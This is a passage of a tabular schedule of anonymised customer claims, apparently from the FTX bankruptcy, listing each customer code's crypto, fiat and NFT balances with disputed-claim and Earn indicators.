| 07382347 | | USD[0.00] | | |
| 07382350 | | USD[0.01] | | |
| 07382351 | | USD[10.00] | | |
| 07382352 | | USD[10.00] | | |
| 07382353 | | USD[10.00] | | |
| 07382354 | | USD[11.00] | Yes | |
| 07382358 | | ETH[.000725], ETHW[.000725], USDT[7.8605708] | | |
| 07382359 | | USD[10.00] | | |
| 07382360 | | USD[10.00] | | |
| 07382361 | | CUSDT[5], DOGE[60.13070913], SHIB[349214.85371674], TRX[.00001925], USD[0.01] | Yes | |
| 07382362 | | CUSDT[1], DOGE[1042.91249069], TRX[104.56672551], USD[0.00] | Yes | |
| 07382363 | | DOGE[8784.46327181], ETH[1.00848306], ETHW[1.00848306], USD[0.00] | | |
| 07382364 | | USD[10.00] | | |
| 07382365 | | USD[10.00] | | |
| 07382366 | | USD[10.00] | | |
| 07382367 | | USD[10.00] | | |
| 07382369 | | USD[10.00] | | |
| 07382370 | | DOGE[1623.82819700], ETH[1.21931271], ETHW[1.21931271], SOL[537.47256207], SUSHI[88.85770671], USD[1.09] | | |
| 07382371 | | DOGE[76.31514659], USD[0.00] | | |
| 07382372 | | BTC[0], DOGE[1], ETH[0], LTC[0], NFT (336738869502366428/DDD #29)[1], NFT (365350113653338135/Drisis-01)[1], NFT (384452642882418755/Recline)[1], NFT (436574539532183000/Surreal World #50)[1], NFT (565339277430168461/DDD #9)[1], NFT (570951273134249255/DDD #2)[1], SOL[0], TRX[0], USD[97.56] | Yes | |
| 07382373 | | USD[0.00] | | |
| 07382376 | | MATIC[6.04722171], USD[0.00] | Yes | |
| 07382377 | | USD[10.00] | | |
| 07382378 | | BRZ[1], CUSDT[2], DOGE[.00002905], USD[0.00] | | |
| 07382379 | | USD[10.00] | | |
| 07382380 | | BAT[1], CUSDT[1], DOGE[2], SUSHI[.00075788], UNI[.00204155], USD[0.00], USDT[1] | | |
| 07382381 | | BTC[0], CUSDT[5], DOGE[1], ETHW[.34079486], MATIC[36.51866486], SHIB[1], TRX[4], USD[813.42] | Yes | |
| 07382382 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07382384 | | TRX[.03894426], USD[0.00] | | |
| 07382386 | | TRX[1], USD[0.00] | | |
| 07382387 | | BRZ[1], BTC[.00004589], CUSDT[3], GRT[6.910939], LINK[.02879472], MATIC[11.2270018], TRX[.27363812], USD[1.19], USDT[.0096476] | Yes | |
| 07382388 | | USD[10.00] | | |
| 07382389 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382390 | | USD[10.00] | | |
| 07382391 | | DOGE[1.00033776], USD[7.72] | | |
| 07382392 | | BRZ[1], BTC[.00224924], CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07382393 | | USD[10.00] | | |
| 07382394 | | USD[10.00] | | |
| 07382395 | | BAT[0], BCH[0], CUSDT[11], DOGE[303.19824525], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07382396 | | BRZ[1], CUSDT[1], DOGE[262.24529327], USD[10.01] | | |
| 07382398 | | DOGE[1], LINK[0], USD[0.00] | | |
| 07382399 | | DOGE[31.00001745], SUSHI[.58624325], USD[0.00] | | |
| 07382401 | | DOGE[147.36160829], USD[0.00] | | |
| 07382403 | | TRX[181.2452491], USD[0.00] | | |
| 07382404 | | DOGE[30.82617287], USD[0.00] | | |
| 07382405 | | DOGE[.13087367], NFT (415103887681104384/Coachella x FTX Weekend 1 #22040)[1], USD[0.14] | | |
| 07382406 | | DOGE[0], USD[0.01] | | |
| 07382408 | | USD[10.00] | | |
| 07382409 | | DOGE[139.95691988], USD[0.00] | | |
| 07382410 | | USD[10.00] | | |
| 07382411 | Contingent, Disputed | DOGE[17.75760639], USD[0.00] | | |
| 07382412 | | BRZ[2], CUSDT[3], DOGE[22386.65217351], GRT[70.14598883], KSHIB[1831.91451847], LTC[.17878872], MATIC[38.37186018], SHIB[6], TRX[1], UNI[2.53939471], USD[-110.17], USDT[0] | Yes | |
| 07382413 | | BRZ[2], CUSDT[10], DOGE[1247.6497186], ETH[.02687526], ETHW[.02687526], TRX[228.68117526], USD[0.41] | | |
| 07382415 | | BTC[.00219885], CUSDT[944.16224484], DOGE[1265.27287827], ETH[.05218018], ETHW[.05218018], GRT[29.19155801], TRX[965.05545908], USD[51.00], USDT[19.9000799] | | |
| 07382416 | | DOGE[86.92068628], TRX[0], USD[0.00] | Yes | |
| 07382417 | | BTC[.00020566], USD[0.00] | | |
| 07382418 | | DOGE[143.90938774], USD[0.00] | | |
| 07382419 | | USD[10.00] | | |
| 07382423 | | BRZ[1], CUSDT[6], DOGE[1.00002277], ETH[0], ETHW[0], USD[0.00] | | |
| 07382424 | | BTC[.00002524], DOGE[11.89678343], SOL[.01273729], USD[-1.60], USDT[.16518985] | Yes | |
| 07382425 | | USD[10.00] | | |
| 07382426 | | BRZ[2], DOGE[2223.53285946], USD[26.81] | Yes | |
| 07382427 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07382428 | | USD[10.00] | | |
| 07382429 | | NFT (514996155271668342/Entrance Voucher #2731)[1], USD[100.00] | | |
| 07382430 | | CUSDT[1], DOGE[.00001172], TRX[1], USD[0.00] | | |
| 07382431 | | SOL[1.37944176], USD[0.11] | Yes | |
| 07382432 | | USD[10.00] | | |
| 07382433 | | LINK[.35671446], USD[0.00] | | |
| 07382434 | | USD[10.00] | | |
| 07382435 | | USD[10.00] | | |
| 07382436 | | DOGE[16.1270737], TRX[1], USD[0.00] | | |
| 07382437 | | DOGE[.00004346], TRX[1], USD[0.00] | | |
| 07382438 | | CUSDT[4], DOGE[1], USD[0.01] | | |
| 07382440 | | DOGE[144.97892378], USD[0.00] | | |
| 07382441 | | USD[10.00] | | |
| 07382442 | | DOGE[.06589932], SHIB[763340.2702691], USD[0.03] | Yes | |
| 07382443 | | BAT[.25906592], CUSDT[1], DOGE[1], USD[130.95] | | |
| 07382445 | | USD[10.00] | | |
| 07382446 | | BCH[0], BTC[0], DOGE[9942.55167309], ETH[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07382447 | | USD[10.00] | | |
| 07382448 | | USD[10.00] | | |
| 07382449 | | SHIB[1], TRX[1], USD[0.00] | | |
| 07382453 | | USD[10.00] | | |
| 07382454 | | USD[10.00] | | |
| 07382456 | | USD[10.00] | | |
| 07382458 | | USD[10.00] | | |
| 07382460 | | USD[10.00] | | |
| 07382461 | | BAT[77.23120241], CUSDT[23337.96646162], DOGE[13692.78801587], ETH[.67288549], ETHW[.67288549], GRT[104.91008966], TRX[3273.9421018], USD[0.00] | | |
| 07382463 | | BTC[0.00001990], CUSDT[1], DOGE[1511.53179865], USD[0.00] | | |
| 07382464 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382465 | | USD[10.00] | | |
| 07382466 | | USD[10.00] | | |
| 07382467 | | USD[10.00] | | |
| 07382469 | | DOGE[31.97957195], USD[0.00] | | |
| 07382470 | | USD[10.00] | | |
| 07382471 | | CUSDT[1], USD[0.00] | | |
| 07382472 | | USD[0.01] | | |
| 07382473 | | USD[10.00] | | |
| 07382474 | | USD[10.00] | | |
| 07382475 | | USD[10.00] | | |
| 07382476 | | CUSDT[2], DOGE[61.53326407], USD[0.00] | | |
| 07382478 | | BTC[0], CUSDT[2], ETH[0.00021087], ETHW[0.00021087], USD[0.00] | | |
| 07382481 | | USD[10.00] | | |
| 07382482 | | CUSDT[3], DOGE[2784.21303779], ETH[.00698325], ETHW[.00690117], TRX[75.13621494], USD[0.02] | Yes | |
| 07382483 | | DOGE[0.71564862], ETH[.000601], ETHW[.000601], SUSHI[.29600001], USD[2823.72] | | |
| 07382484 | | BRZ[2], CUSDT[7], DOGE[2286.02819066], ETH[.03104955], ETHW[.03066651], LINK[0], LTC[0], MATIC[21.19949159], SHIB[1409898.69034309], SOL[2.01936765], SUSHI[24.10166169], TRX[5], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07382485 | | USD[10.00] | | |
| 07382486 | | DOGE[136.57017282], USD[0.00] | Yes | |
| 07382489 | | BAT[0], BRZ[1], CUSDT[1], DOGE[665.76662096], ETH[0], ETHW[0], GRT[0], SHIB[1], UNI[0], USD[0.01] | Yes | |
| 07382490 | | DOGE[1409.89150427], TRX[1], USD[10.00] | | |
| 07382491 | | USD[10.00] | | |
| 07382492 | | DOGE[0], SOL[0], TRX[0], USD[0.04], USDT[0] | | |
| 07382493 | | BRZ[2], CUSDT[2], USD[0.00] | | |
| 07382494 | | CUSDT[2], USD[12.32] | | |
| 07382495 | | GRT[.00229499], NFT [390091529783221120/Entrance Voucher #3945][1], NFT [520519695403198142/Wombats in Disguise #4][1], NFT [559742839296241488/Humpty Dumpty #323][1], SHIB[1], USD[0.00] | | |
| 07382496 | | BRZ[2], CUSDT[1], GRT[1], TRX[2], USD[0.00], USDT[1] | | |
| 07382497 | | DOGE[4.99852767], USD[0.04], USDT[1] | | |
| 07382498 | | USD[10.00] | | |
| 07382499 | | USD[10.00] | | |
| 07382500 | | DOGE[245.09569136], USD[10.00] | | |
| 07382501 | | USD[10.00] | | |
| 07382503 | | USD[10.00] | | |
| 07382507 | | USD[10.00] | | |
| 07382509 | | DOGE[19.56831105], USD[0.00] | Yes | |
| 07382511 | | USD[10.00] | | |
| 07382512 | | DOGE[0], ETH[0], USD[2433.04], USDT[0] | Yes | |
| 07382513 | | USD[0.00] | | |
| 07382514 | | MATIC[31.02524706] | | |
| 07382515 | | DOGE[.03089463], USD[0.00] | | |
| 07382516 | | DOGE[1], USD[0.01] | | |
| 07382517 | | USD[35.00] | | |
| 07382518 | | DOGE[16.97667201], USD[0.00] | | |
| 07382519 | | AUD[1.27], BTC[.00002358], EUR[0.81], SGD[0.00], USD[5.86] | | |
| 07382520 | | DOGE[.60302038], UNI[.02359369], USD[-0.17] | | |
| 07382521 | | CUSDT[4], TRX[1], USD[165.41] | | |
| 07382522 | | BTC[.00032284], DOGE[1283.56056819], ETH[.01711675], ETHW[.01711675], LTC[.08787912], USD[25.00] | | |
| 07382523 | | USD[0.00] | | |
| 07382524 | | CUSDT[1], DOGE[7461.99363539], TRX[4843.30034569], USD[454.31] | Yes | |
| 07382525 | | USD[10.00] | | |
| 07382527 | Contingent, Disputed | BTC[0], CUSDT[16], DOGE[1.00005592], LTC[0], SOL[0.00000633], TRX[1], USD[0.00], USDT[0.00000157] | Yes | |
| 07382528 | | USD[10.00] | | |
| 07382529 | Contingent, Disputed | BAT[79.79393209], BCH[0], BRZ[1], BTC[0], DOGE[0], ETH[0], GRT[0], SHIB[3], SOL[0], TRX[8], USD[0.00], YFI[0] | Yes | |
| 07382530 | | BAT[47.88393237], BRZ[2], CUSDT[21], DOGE[1376.76421164], TRX[794.82489922], USD[0.00] | Yes | |
| 07382531 | | DOGE[1], USD[0.01] | | |
| 07382532 | | BRZ[2], DOGE[.00000096], USD[0.01] | | |
| 07382533 | | CUSDT[4], ETH[.00182096], ETHW[.0017936], SHIB[2], USD[0.00] | Yes | |
| 07382534 | | USD[10.00] | | |
| 07382535 | | LINK[.11348163], LTC[.05643996], SOL[.23489029], USD[0.08] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382536 | | USD[10.00] | | |
| 07382537 | | USD[10.00] | | |
| 07382538 | | CUSDT[1], USD[0.00] | | |
| 07382539 | | DOGE[36.4418525], GRT[.99492055], SUSHI[.05964609], TRX[21.54705715], UNI[.00330521], USD[4.13] | | |
| 07382540 | | USD[10.00] | | |
| 07382541 | | BRZ[1], DOGE[682.43283178], USD[0.00] | Yes | |
| 07382542 | | BTC[0.00018545], LTC[.00958271], USD[17.53] | | |
| 07382543 | | BAT[2], CUSDT[1], DOGE[1], TRX[2], USD[0.01] | | |
| 07382544 | | USD[10.00] | | |
| 07382545 | | CUSDT[1], DOGE[106.10986465], TRX[1], USD[0.00] | | |
| 07382546 | | TRX[62.69455445], USD[0.00] | | |
| 07382548 | | USD[10.00] | | |
| 07382551 | | USD[10.00] | | |
| 07382552 | | USD[10.00] | | |
| 07382553 | | USD[10.00] | | |
| 07382555 | | USD[10.00] | | |
| 07382557 | | DOGE[132.95948671], USD[0.00] | | |
| 07382558 | | BRZ[2], DOGE[2], SHIB[76488730.46017573], TRX[1584.20761345], UNI[1], USD[0.00] | | |
| 07382559 | | CUSDT[1], DOGE[2717.32702128], TRX[1], USD[10.00] | | |
| 07382560 | | BRZ[2], BTC[0], CUSDT[1], GRT[1], TRX[2], UNI[1], USD[0.00] | | |
| 07382561 | | BRZ[1], DOGE[1], SUSHI[743.14307555], TRX[1], USD[10.90] | Yes | |
| 07382562 | | CUSDT[1], DOGE[139.08668174], USD[0.00] | | |
| 07382564 | | BTC[0], DOGE[0], TRX[3], USD[0.00] | | |
| 07382565 | | CUSDT[1], ETH[.00000001], ETHW[0], GRT[0], TRX[5357.86133748], USD[10.00] | | |
| 07382566 | Contingent, Disputed | SOL[1.00103438], USD[0.01] | | |
| 07382567 | | CUSDT[5], DOGE[4], USD[0.00] | | |
| 07382568 | | USD[10.00] | | |
| 07382569 | | SHIB[266827.38196721], USD[0.00] | | |
| 07382570 | | USD[0.00] | | |
| 07382571 | | USD[0.00] | | |
| 07382572 | | USD[0.00] | | |
| 07382573 | | USD[10.00] | | |
| 07382574 | | BAT[0], BTC[0], CUSDT[0], DOGE[0], NFT (291167547500526647/Baddies #1025)[1], NFT (299680271441060915/FTX Crypto Cup 2022 Key #2331)[1], NFT (320220398539262977/FTX Crypto Cup 2022 Key #2330)[1], NFT (342155623409332347/Solana Islands #1973)[1], NFT (346147884865425792/Saudi Arabia Ticket Stub #311)[1], NFT (360200566599806467/FTX Crypto Cup 2022 Key #2328)[1], NFT (386728691169631458/#006 | Series #1)[1], NFT (406625372945827469/FTX Crypto Cup 2022 Key #2329)[1], NFT (425505647570284170/The Hill by FTX #8291)[1], NFT (432164885601731722/Waterfall)[1], NFT (461730513197428031/#003 | Series #1)[1], NFT (463970545839533724/Molly Water #9)[1], NFT (469152332077789193/Heaven on Earth #6)[1], NFT (507004384673622092/The Hill by FTX #8211)[1], NFT (510843333040819029/lazyPanda #51)[1], NFT (518233012548772110/DDD #21)[1], NFT (520323657788084816/green alien Set Rar)[1], NFT (531051324543411574/Baddies #3400)[1], NFT (562841690254580372/The Hill by FTX #6320)[1], NFT (569090013623037966/Solana Penguin #6043)[1], SOL[0.00264028], USD[0.00], USD[0.00000001] | | |
| 07382575 | Contingent, Disputed | CUSDT[2], USD[0.00] | | |
| 07382576 | | USD[10.00] | | |
| 07382577 | | DOGE[1.11421022], SOL[.00126888], USD[0.00] | | |
| 07382578 | | DOGE[174.58058168], USD[0.79] | Yes | |
| 07382579 | | USD[11.06] | Yes | |
| 07382580 | | BAT[46.76675988], BRZ[1], BTC[.00000027], CUSDT[35], DAI[15.40869617], DOGE[120.06204133], ETH[0], GRT[1.00460408], SOL[.00000001], TRX[9.00087675], USD[4.00], USDT[1.06821656] | Yes | |
| 07382582 | | SHIB[1], TRX[0], USD[0.00] | | |
| 07382583 | | USD[10.00] | | |
| 07382585 | | USD[0.00], USDT[1] | | |
| 07382587 | | CUSDT[937.11922414], DOGE[33.76895624], USD[0.01] | | |
| 07382588 | | BTC[.00031852], CUSDT[2], DOGE[304.1076414], ETH[.00812666], ETHW[.00812666], SUSHI[1.12263109], TRX[101.05327503], USD[0.00] | | |
| 07382589 | | USD[10.00] | | |
| 07382590 | | SOL[.0053198], USD[985.20] | Yes | |
| 07382591 | | SOL[2.43170788] | | |
| 07382593 | | CUSDT[1], USD[0.00] | Yes | |
| 07382594 | | USD[10.00] | | |
| 07382595 | | USD[10.00] | | |
| 07382597 | | DOGE[183.82058963], USD[0.00] | | |
| 07382598 | | USD[10.00] | | |
| 07382599 | | BRZ[1], CUSDT[.00097135], CUSDT[1022.08510108], DOGE[263.53555561], SHIB[709537.1055248], TRX[444.42107429], USD[0.02] | Yes | |
| 07382600 | | USD[0.01] | Yes | |
| 07382601 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382602 | | USD[10.00] | | |
| 07382603 | | USD[10.00] | | |
| 07382604 | | BTC[0.02508267], ETH[.48587235], ETHW[.48587235], SOL[1.4486225], USD[4.65] | | |
| 07382605 | | USD[10.00] | | |
| 07382606 | | BTC[0.02299900], USD[0.00] | | |
| 07382607 | | USD[10.00] | | |
| 07382608 | | USD[10.00] | | |
| 07382612 | | CUSDT[2], TRX[396.74400727], USD[0.00] | | |
| 07382613 | | DOGE[198.02705925], USD[0.00] | Yes | |
| 07382614 | | USD[0.00] | Yes | |
| 07382615 | | USD[10.00] | | |
| 07382616 | | BTC[.00000006], CUSDT[12], DOGE[.00632086], ETH[.00000233], ETHW[.00000233], LINK[.00000677], LTC[.00000073], SHIB[8.06907757], SOL[.00004895], TRX[2.00513111], USD[0.00], USDT[0] | Yes | |
| 07382617 | | BRZ[1], BTC[.02906554], CUSDT[2], DOGE[3], ETH[.24090853], ETHW[.24071273], TRX[2], USD[49.85] | Yes | |
| 07382618 | | BTC[.00003202], USD[0.21], USDT[2.2666472] | | |
| 07382620 | | DOGE[15.47821548], USD[0.00] | | |
| 07382622 | | CUSDT[1], DOGE[136.65525868], USD[0.00] | | |
| 07382623 | | USD[10.00] | | |
| 07382625 | | USD[10.00] | | |
| 07382626 | | BAT[1.0165555], DOGE[2], USD[0.00], USDT[1.09617337] | Yes | |
| 07382627 | | DOGE[136.66762242], USD[0.00] | | |
| 07382628 | | CUSDT[5], USD[0.01] | | |
| 07382629 | | BTC[0.00000911], ETH[0], LTC[0], USD[7.39], USDT[1.44148465] | | |
| 07382630 | | USD[0.36], USDT[0] | | |
| 07382631 | | BTC[0], DOGE[0], LTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07382632 | | BTC[.00024636], CUSDT[1], USD[0.00] | Yes | |
| 07382633 | | USD[10.00] | | |
| 07382636 | | USD[10.00] | | |
| 07382637 | | BAT[204.08213422], BRZ[1], CUSDT[5], DOGE[18807.00954601], GRT[35.15784538], LINK[.00028514], MATIC[1047.67742877], SHIB[61366.26785025], SOL[22.09038636], TRX[4136.50572769], USD[0.00] | | |
| 07382639 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[0.00] | Yes | |
| 07382640 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07382641 | | DOGE[122.91463038], USD[10.00] | | |
| 07382643 | | CUSDT[2], DOGE[721.39005447], MATIC[60.50096522], SHIB[415668.497427], TRX[2], USD[0.00] | | |
| 07382644 | | BTC[.15398197], DOGE[16570.11847577], USD[0.00] | | |
| 07382645 | | CUSDT[4], DOGE[332.0053951], ETH[.08252241], ETHW[.08252241], TRX[2], USD[0.01] | | |
| 07382646 | | USD[10.00] | | |
| 07382647 | | DOGE[.00002004], GRT[0], USD[0.00] | Yes | |
| 07382648 | | BTC[.00000016], DOGE[333.20338699], USD[0.00] | Yes | |
| 07382649 | | BTC[.00357952], DOGE[2034.48888447], LINK[1.23377919], TRX[2], USD[116.98] | Yes | |
| 07382652 | | USD[10.00] | | |
| 07382653 | | DOGE[0], LINK[27.53969380], SOL[50.00306676] | | |
| 07382654 | | CUSDT[1], DOGE[7052.32823113], USD[10.00] | | |
| 07382655 | | BRZ[1], BTC[0.00013333], CUSDT[14], DOGE[0], USD[0.00], USDT[1.10642255] | Yes | |
| 07382656 | | USD[10.00] | | |
| 07382657 | | BRZ[12.31202076], SUSHI[1], TRX[166.93034706], USD[0.00] | | |
| 07382658 | | USD[10.00] | | |
| 07382659 | | BRZ[2], BTC[.01614273], DOGE[4127.36244688], GRT[1], MATIC[11.10198096], SHIB[8], SOL[.92565558], TRX[19], USD[300.00], USDT[0] | | |
| 07382661 | | BTC[0], USD[0.00] | | |
| 07382662 | | DOGE[124.51931224], USD[10.00] | | |
| 07382663 | | USD[10.00] | | |
| 07382664 | | USD[10.00] | | |
| 07382665 | | USD[10.00] | | |
| 07382667 | | AUD[0.00], BAT[0.00060693], BRZ[6.50488597], BTC[0], CUSDT[25], DOGE[3], ETH[0], GRT[0], LINK[0], LTC[0], SHIB[0], TRX[6], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07382668 | | USD[10.00] | | |
| 07382669 | | ETH[.000572], ETHW[.000572], USD[4.16] | | |
| 07382670 | | BTC[.00020796], USD[0.00] | | |
| 07382671 | | DOGE[1], USD[2.43] | | |
| 07382672 | | USD[10.00] | | |
| 07382673 | | BRZ[2], CUSDT[5], DOGE[0], ETH[0], TRX[2], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382674 | | USD[10.00] | | |
| 07382675 | | CUSDT[3], SHIB[1], TRX[1], USD[0.00], USDT[1] | | |
| 07382677 | | USD[10.00] | | |
| 07382678 | | USD[10.00] | | |
| 07382679 | | CUSDT[2], DOGE[1], USD[31.15] | | |
| 07382680 | | TRX[.00175487], USD[0.00] | | |
| 07382681 | | DOGE[2], USD[0.00] | | |
| 07382682 | | BAT[.79448971], BRZ[4.66555714], BTC[.00001533], CUSDT[12], DOGE[2.73337327], ETH[.00000412], ETHW[.00000412], LINK[.12159081], SHIB[163287.00235796], SOL[.00072261], TRX[13.75788342], USD[0.00], USDT[0.01414132] | Yes | |
| 07382683 | | DOGE[1], USD[0.01] | Yes | |
| 07382684 | | CUSDT[1], USD[0.00], USDT[0] | Yes | |
| 07382685 | | DOGE[1], UNI[4.18025681], USD[108.93] | Yes | |
| 07382686 | | BRZ[2], CUSDT[2], TRX[5], USD[0.81], USDT[0] | | |
| 07382687 | | USD[10.00] | | |
| 07382688 | | BCH[0], BTC[0], CUSDT[1], DAI[0], DOGE[39.21058464], ETH[0], LINK[0], LTC[0], SOL[0], USD[0.00] | | |
| 07382689 | | USD[10.00] | | |
| 07382690 | | CUSDT[1], USD[0.00] | | |
| 07382691 | | USD[0.00] | | |
| 07382693 | | BTC[.00000001], CUSDT[2], DOGE[17.63339688], SUSHI[.00086394], TRX[.08858729], USD[0.00] | | |
| 07382694 | | BRZ[1], CUSDT[2], DOGE[590.58698487], MATIC[97.09783884], SOL[48.37775496], TRX[2], USD[0.00] | Yes | |
| 07382696 | | DOGE[326.04594002], USD[0.00] | | |
| 07382697 | | USD[10.00] | | |
| 07382698 | | BTC[0], DOGE[8], LTC[0], TRX[3], USD[0.00] | | |
| 07382699 | | BTC[.00086467], CUSDT[4], DOGE[113.73696494], ETH[.01787664], ETHW[.01765776], TRX[1261.71663035], USD[0.00] | Yes | |
| 07382700 | | USD[10.00] | | |
| 07382701 | | USD[10.00] | | |
| 07382702 | | BTC[.00009366], USDT[0.00019562] | | |
| 07382703 | | DOGE[1], USD[0.00] | | |
| 07382705 | | BRZ[1], DOGE[4], LINK[3.70369334], SOL[47.56485961], USD[0.00] | | |
| 07382706 | | USD[11.08] | Yes | |
| 07382707 | | USD[0.00] | | |
| 07382708 | | BAT[1.01655549], CUSDT[3], DOGE[2537.89242286], TRX[1710.91781385], USD[0.00] | Yes | |
| 07382709 | | CUSDT[3], TRX[1], USD[37.61] | | |
| 07382710 | | USD[10.00] | | |
| 07382711 | | USD[10.00] | | |
| 07382712 | | DOGE[1.73030726], TRX[1], USD[0.20] | | |
| 07382714 | | BTC[.00021224], TRX[1], USD[0.00] | | |
| 07382716 | | BTC[.02290657], CUSDT[3], DOGE[337.76896137], ETH[1.00090418], ETHW[1.00090418], GRT[1], MATIC[84.26616753], SOL[3.76869437], TRX[331.48592617], USD[0.72] | | |
| 07382717 | | USD[10.00] | | |
| 07382718 | | BTC[.00003899], DOGE[ 543], ETHW[1.26384984], SOL[.00335], USD[0.01] | | |
| 07382719 | | BRZ[1], TRX[8.26237102], USD[0.11] | | |
| 07382720 | | BRZ[1], CUSDT[3], DOGE[0], ETHW[1.09261096], SHIB[1], USD[50.68] | Yes | |
| 07382724 | | USD[10.00] | | |
| 07382725 | | USD[10.00] | | |
| 07382726 | | BRZ[2], CUSDT[9368.83945771], DOGE[11381.01053699], TRX[1482.85688522], USD[0.00], USDT[1] | | |
| 07382727 | | USD[10.00] | | |
| 07382728 | | USD[10.00] | | |
| 07382729 | | DOGE[194.94412414], TRX[1], USD[0.00] | | |
| 07382730 | | DOGE[189.78180595], USD[0.00] | | |
| 07382731 | | CUSDT[86.36963114], DOGE[1454.46302389], GRT[4.82144597], SUSHI[1.56318505], TRX[18.3038195], USD[0.00] | Yes | |
| 07382732 | | BTC[.0008457], DOGE[38.3109479], GRT[1.18432663], USD[0.00] | | |
| 07382733 | | BRZ[1], CUSDT[1], DOGE[4591.20364919], USD[10.00] | | |
| 07382734 | | BRZ[3], CUSDT[6], DOGE[2156.03182185], ETHW[9.51337283], GRT[2000.57362088], SOL[21.63769113], SUSHI[246.7417103], TRX[6], USD[0.01], USDT[1.08472461] | Yes | |
| 07382735 | | DOGE[3607.30043845], KSHIB[0], SHIB[2363369.232492], USD[0.00] | | |
| 07382736 | | BCH[.03828416], BTC[.00644835], CUSDT[15], DOGE[710.50542378], ETH[.0455005], ETHW[.04493624], LINK[.86360865], LTC[.07937239], SHIB[482409.45561686], SOL[.83065378], SUSHI[4.41046528], TRX[494.82014173], USD[0.00] | Yes | |
| 07382737 | | CUSDT[2], DOGE[.00068245], USD[0.04] | Yes | |
| 07382738 | | BTC[.0000705], ETH[.000442], ETHW[.000442] | | |
| 07382739 | Contingent, Disputed | USD[0.01] | | |
| 07382740 | | USD[10.98] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382741 | | USD[0.00] | | |
| 07382742 | | USD[10.00] | | |
| 07382743 | | SOL[.4], USDT[0.00000007] | | |
| 07382744 | | USD[10.00] | | |
| 07382745 | | USD[10.00] | | |
| 07382746 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07382747 | | DOGE[168.48552406], USD[0.00] | | |
| 07382748 | | USD[0.00] | | |
| 07382749 | | USD[0.01] | | |
| 07382750 | | USD[10.90] | Yes | |
| 07382752 | | USD[10.00] | | |
| 07382753 | | USD[10.00] | | |
| 07382755 | | SOL[.09299879], USD[0.03] | Yes | |
| 07382756 | | BTC[.00172166], CUSDT[2], DOGE[1], LTC[.00847534], USD[1.62] | | |
| 07382757 | | USD[10.00] | | |
| 07382759 | | USD[10.00] | | |
| 07382760 | | BAT[23.25426673], USD[0.00] | | |
| 07382761 | | CUSDT[1], DOGE[161.81531361], USD[0.00] | | |
| 07382763 | | DOGE[.00000001], SHIB[1], USD[0.00] | Yes | |
| 07382764 | | BTC[0], DOGE[0.97014879], ETH[0], SUSHI[0], USD[0.00] | | |
| 07382765 | | BRZ[1], DOGE[0.00004240], GRT[1], TRX[4], USD[0.00] | | |
| 07382766 | | CUSDT[1], DOGE[1.00004694], USD[0.00] | | |
| 07382767 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07382769 | | DOGE[547.01653429], KSHIB[1074.70946138], SHIB[802119.41640843], USD[0.00] | | |
| 07382770 | | TRX[65.87142293], USD[0.00] | | |
| 07382771 | | USD[10.00] | | |
| 07382772 | | USD[10.00] | | |
| 07382773 | | USD[10.00] | | |
| 07382775 | | USD[0.00] | | |
| 07382776 | | USD[10.00] | | |
| 07382777 | | USD[10.00] | | |
| 07382778 | | CUSDT[2], DOGE[1376.4549409], SHIB[374996.89566959], TRX[1], USD[0.01] | | |
| 07382779 | | BRZ[1], CUSDT[2], DOGE[5], ETHW[.08727783], SHIB[1], TRX[1], USD[277.68] | | |
| 07382780 | | USD[11.11] | Yes | |
| 07382781 | | CUSDT[561.72287246], GRT[1.00367791], TRX[1.07639587], USD[0.00], USDT[0] | Yes | |
| 07382782 | | USD[10.00] | | |
| 07382783 | | CUSDT[1], USD[0.80] | Yes | |
| 07382784 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[1.07978267], USD[0.00], USDT[0] | Yes | |
| 07382785 | | USD[6.70] | | |
| 07382788 | | USD[0.00] | | |
| 07382789 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07382790 | | USD[10.00] | | |
| 07382791 | | DOGE[125.3822906], USD[20.00] | | |
| 07382792 | | USD[10.00] | | |
| 07382793 | | CUSDT[354.86987144], DOGE[2.01377435], TRX[2.05168367], USD[0.53] | | |
| 07382794 | | BAT[101.94194947], BRZ[1.67139877], CUSDT[10], DOGE[658.79139603], KSHIB[8148.71735114], SHIB[1], SOL[.00001572], SUSHI[.00008087], TRX[961.18371556], USD[107.25] | | |
| 07382796 | | BAT[2], CUSDT[6], DOGE[1], TRX[1], USD[0.00] | | |
| 07382797 | | DOGE[20.84862666], USD[0.00] | | |
| 07382798 | | DOGE[0], USD[0.00] | | |
| 07382801 | | DOGE[122.5675249], USD[0.00] | | |
| 07382803 | | USD[10.00] | | |
| 07382804 | | TRX[.000563], USD[607.60], USDT[0] | | |
| 07382806 | | USD[10.92] | Yes | |
